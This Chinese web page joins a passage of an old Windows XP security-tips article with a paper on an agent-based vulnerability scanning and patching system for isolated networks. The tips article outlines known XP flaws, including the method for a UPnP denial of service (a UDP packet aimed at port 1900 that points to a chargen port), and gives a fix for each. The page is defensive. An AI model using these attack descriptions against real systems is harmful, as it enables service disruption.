对运行了UPnP服务的系统实施攻击并非难事,只要向该系统的1900端口发送一个UDP包,其中“LOCATION”域的地址指向另一个系统的Chargen端口,就可能使系统进入一个无限的连接循环,这将会导致受影响系统 CPU 和内存占用率达100%,使远程XP系统完全不能使用而拒绝了服务,只有通过重启后系统才能恢复正常,
另外,攻击者只要向某个拥有众多XP主机的网络发送一个伪造的UDP报文,也可能会导致目标网络上所有的XP主机通过所选择的URL,执行了一个攻击的选择。而且当UPNP的部分服务被当作UDP来执行的时候,他产生的所有这些攻击都是难以找到的。
解决办法:最明智的做法是完全关闭UPNP服务,因为大多数的人都不用他们。要记住:服务开得越少,你就越安全。单击XP的控制面板/管理工具/服务,双击“Universal Plug and Play Device Host”服务,在启动类型中选择“已禁用”(如图2)关闭UPnP服务。
三、热键并不那么轻松
热键打开程序的方式是很方便的,所以热键功能也是Win XP的系统服务之一。当用户登陆Win XP时,热键功能随之启动,于是你就可以使用系统默认的、或者自己设置的热键了。如果你的电脑没有设置屏幕保护程序和密码,而你需要暂时离开电脑,办理其他事情,Win XP就会在处于静止状态一段时间后进行自动注销,不过这种“注销”是一种假注销,你所有的后台程序都还在运行,与没有注销前几乎没有什么差别,因此其他人虽然进不了你的桌面,看不到你的电脑里放了些什么,但是却可以继续使用热键。
这时一个别有用心的并且经验丰富的人就可以利用这些热键干一些事,最简单比如打开N个大程序,来破坏你的机器,可以打开并使用某个程序,特别是一些与网络有关的敏感程序(和服务)……
解决办法:其实,利用这个漏洞做出坏事的几率是十分小的,但漏洞确实存在,不得不防吧!所以在离开计算机的时候,还是按下Windows键+L键,锁定计算机;或者打开屏幕保护程序、并设置密码;或者检查可能会带来危害的程序和服务的热键,取消这些热键。
四、远程控制轻易别用
当连接建立的时候,Windows Xp远程桌面把账户名以明文发送给连接它的客户端。发送的账户名不一定是远端主机的用户账号,也可以是最常被客户端使用的账户名,网络上的嗅探程序可能会捕获到这些账户信息。
建立网络连接时,Win XP远程桌面会把用户名以明文形式、发送到连接它的客户端。发送的用户名可以是远端主机的用户名,也可能是客户端常用的用户名,网络上的嗅探程序可能会捕获到这些账户信息。
安全对策:单击控制面板/系统/远程,取消“允许用户远程连接到这台计算机”(如图3),以便停止远程桌面使用。
五、“帮助和支持中心”缺陷
Windows Xp的“帮助和支持中心”功能(如图4),可以向用户提供集中化服务和帮助,如提供产品文档,判断硬件兼容性帮助,访问Windows更新,Microsoft在线帮助等。用户和程序可以通过使用”hcp://"前缀执行URI链接来访问帮助和支持中心。由于帮助和支持中心程序没有有效的检查通过HCP协议传递来的信息,导致一个缓冲溢出漏洞存在。当用户与因特网联接时, 就可以利用这个安全漏洞,从一个网页或HTML格式电子邮件中的链接对存在这一缺陷的机器进行远程访问,能够打开或删除被攻击机器上的文件。
解决办法:到微软的网站下载安装解决该问题的补丁,或者安装微软发布的Windows Xp SP1,Win XP SP1可以从微软的网站下载或者购买。
信息技术的快速发展极大的方便了人们的生活,同时信息系统的安全问题也给人们带来了前所未有的烦恼。防火墙、入侵检测、数据加密、通信加密等技术这些逻辑隔离的手段并不能从根本上保证网络的安全。物理隔离机制虽然免除了来自互联网的上的各种攻击,却抵挡不住来自内部网络的入侵。据统计表明,对于网络系统安全的威胁有80%来自网络内部,其成功的可能性要远远大于来自于Internet的攻击, 而且内部攻击的目标主要是获取高级别的秘密信息,其破坏性要远远大于破坏系统本身。因此检测、修补物理隔离网络中的系统漏洞对于防范内部攻击、确保信息安全是一个非常紧迫而又亟待解决的问题。
然而,目前的网络漏洞检测系统,无论是基于主机的漏洞检测系统还是基于网络的漏洞检测系统,虽然都可以检测出网络系统存在的漏洞,但对于漏洞的修补还需要另外的解决方案。特别是对于物理隔离网络来讲,从漏洞发现到从互联网上下载补丁安装,是需要一段时间的。在这段时间内,网络系统的漏洞仍然存在,这种公开的漏洞信息更容易成为一些不法分子攻击的目标。另外对于一些小型的物理隔离网络,配置专门的漏洞扫描检测系统的成本代价太高,可操作性不强。基于此,本文提出了一种基于扫描代理的轻型漏洞扫描与修补系统,运行的成本低,对网络主机的影响小,能实现对物理隔离网络内主机的漏洞扫描及针对漏洞的修补任务。
1、漏洞扫描与修补系统设计模型
系统将大规模的物理网络划分为若干个逻辑子网,并在每个逻辑子网中安装扫描代理,由控制中心集中管理的方式,来实现对网络系统漏洞主机的检测与修补功能。分布在个各子网中的扫描代理负责对所在网段内的主机进行扫描,从而避免了防火墙等保护系统的访问限制,能够获得精准的扫描结果。由于采用控制中心集中控制,各移动代理分布扫描的机制,减少对网络资源的占用,使得本系统扫描效率大大提高的同时,也增强了整个网络系统的整体风险防范能力。
1.1 漏洞扫描系统的的逻辑模型
该系统分为3个子系统:用户界面、控制中心和扫描代理。如图1
用户界面:主要为WEB服务器,负责人机交互, 是系统的用户接口部分。管理员通过用户界面可以设置扫描目标, 针对不同的网络状况形成不同的扫描策略, 通过网络对移动代理的远程控制,实现代理模块的维护及更新,以及查看扫描报告。
控制中心:控制管理模块、通信模块、列表管理模块、数据库管理模块、数据库等组成;负责制定扫描任务、获取扫描报告,记录对网络内主机维护情况并对补丁库进行升级等。
(1) 控制管理模块:主要用于处理扫描代理发送来的主机信息,同时根椐信息制定相应的漏洞扫描策略;并结合补丁列表组成漏洞知识定义集合发送至移动代理。还负责对扫描代理群的调度,实现对目标网络的扫描修补任务。
(2) 通信模块:采用Socket技术,实现控制中心系统与扫描代理之间的信息传递。主要是接收扫描代理回传的各类信息,并上报控制管理模块。传递控制模块对移动代理的各项指令,及向主机发布补丁程序。
(3) 数据库管理模块:用于对数据库中的各类信息的调用、查询、修改、增加、删除的管理任务。依据控制管理模块制定的修复策略生成相应的补丁程序序列,为补丁分发模块进行补丁程序投送做准备。
(4) 列表管理模块:根据数据库中的补丁程序的信息对补丁列表中的记录进行更新等操作。
(5) 数据库:主要用于记录网内各个主机的相关信息以及存放漏洞补丁程序。这些补丁程序一般是通过对各软件公司发布的补丁收集而来的。补丁库中的补丁程序是按照补丁发布的时间先后顺序存储的, 以便对其进行等管理。
1.2 扫描代理的逻辑组成
扫描代理是完成漏洞检测的主要部件,主要根据控制中心制定的扫描任务携带相应的补丁列表对目标网络内种主机进行扫描;扫描各主机上未安装的补丁程序,向控制中心报告扫描结果,主动从数据库中下载相应的补丁程序,并自动安装修补主机漏洞;将修补结果上报控制中心。
它是具体执行扫描的软件实体, 分为通信模块、控制管理模块、传播模块、状况检测模块、补丁连接模块和补丁列表六大部分, 具体逻辑组成如图2所示。
通信模块:主要实现信息的传递通信。它一方面将控制中心系统传来的用户扫描请求、控制信息及时传送至扫描代理后端的相应模块, 另一方面又把扫描的结果反馈给控制中心系统。
控制管理模块:是移动代理的核心,它的功能主要有:接收扫描代理前端传来的扫描请求,完成扫描代理的分发;接收控制中心传来的补丁列表,实现漏洞扫描的组织与情况上报。
传播模块:主要是实现扫描代理的分布式基础,分为第一主机安装模块和其它主机推进模块。第一主机安装模块的功能主要是对子网内的某台主机进行强代理安装,此代理不仅具有扫描本机漏洞的功能,而且还具有扫描子网内定制IP地址主机的功能,如果发现主机存在就对主机进行一般扫描代理安 (此代理功能只具有漏洞扫描和修补功能,无法实现对网络IP地址的扫描)
状况检测模块:主要是执行从控制中心接收的补丁列表信息,用其对目标主机进行漏洞检测。本系统中的漏洞检测基于系统信息收集的结果, 根据不同的系统信息所对应的漏洞定义来调用相应的补丁列表,这样可以避免不必要的列表调用,提高了漏洞检测的效率。
补丁列表:用于记录补丁数据库中的补丁信息,以便在扫描过程中与主机已打补丁情况进行比对。
2. 系统的工作过程
控制中心的工作流程主要有:第1步接受用户申请或者主动定制网络漏洞扫描任务;第2步安装扫描代理到目标网络,扫描网络中目标主机的存在的漏洞。第3步接收扫描代理反馈回的各种信息;第4步,接受代理传回的补丁程序下载请求,向目标主机发布补丁程序。第5步接收补丁修复的反馈信息,并添加到主机信息数据库中。
移动代理的工作流程主要有:第1步强扫描代理安装到第一主机,扫描目标列表内的IP地址。第2步发现IP地址存在主机,对其进行一般扫描代理安装。第3步对所感染主机已经安装补丁情况与补丁列表进行比对;第4步发现未安装补丁,向控制中心报告,并从控制中心下载相应的补丁到主机上运行安装;第5步将主机更新的信息汇报控制中心。
3. 总结
物理隔离网络漏洞检测与修复系统是以分布式扫描代理为核心, 面向异构网络平台而构建的。扫描代理的分布性使其适用于对复杂网络进行快速、有效的安全测试的特点;基于列表的扫描模块更易于其功能的扩充与扩展。该系统还提高了随着网络结构及状况地变化而动态调整扫描系统的灵活度。
摘要:针对企业局域网络因与国际互联网隔离, 对软件供应商发布的漏洞信息接收不及时, 漏洞不能在第一时间内得到修补的状况, 提出了一种基于扫描代理的漏洞扫描与修补系统。把网络划分为若干逻辑子网, 应用扫描代理技术检测子网内各主机的漏洞, 并从控制中心下载补丁程序修补漏洞, 具有扫描速度快、针对性强、对网络影响小、实用性广、成本低廉的特点, 适合物理隔离网络中各主机漏洞发现与修补。
关键词:隔离网络,分布式,扫描代理,漏洞修补
参考文献
[1]陈东红, 王震宇分布式漏洞扫描系统的设计信息工程大学学报[J]2006, 7 (2) :144-146
[2]花青、高岭、张林分布式漏洞检测系统的设计与实现东南大学学报[J]2008, 38 (1) :94-99
[3]Chris hare, Karanjit Siyan.Internet防火墙与网络安全[M].北京:机械工业出版社, 1998
[4]Milliot Jim.Cryptography is urgent need[J].Weekly, 2000, 247 (12) :28-30
【漏洞评估系统方案】推荐阅读:
堵塞扶贫工作管理漏洞07-09
安徽省国税系统纳税评估工作规程(试行)09-14
招聘效果评估方案07-12
大班幼儿发展评估方案05-27
年度绩效考核评估方案06-01
办学水平评估整改方案06-27
班级工作评估量化方案09-19
实践教学评估整改方案05-29
中外合作办学评估方案09-09
二十一中学督导评估整改方案07-01
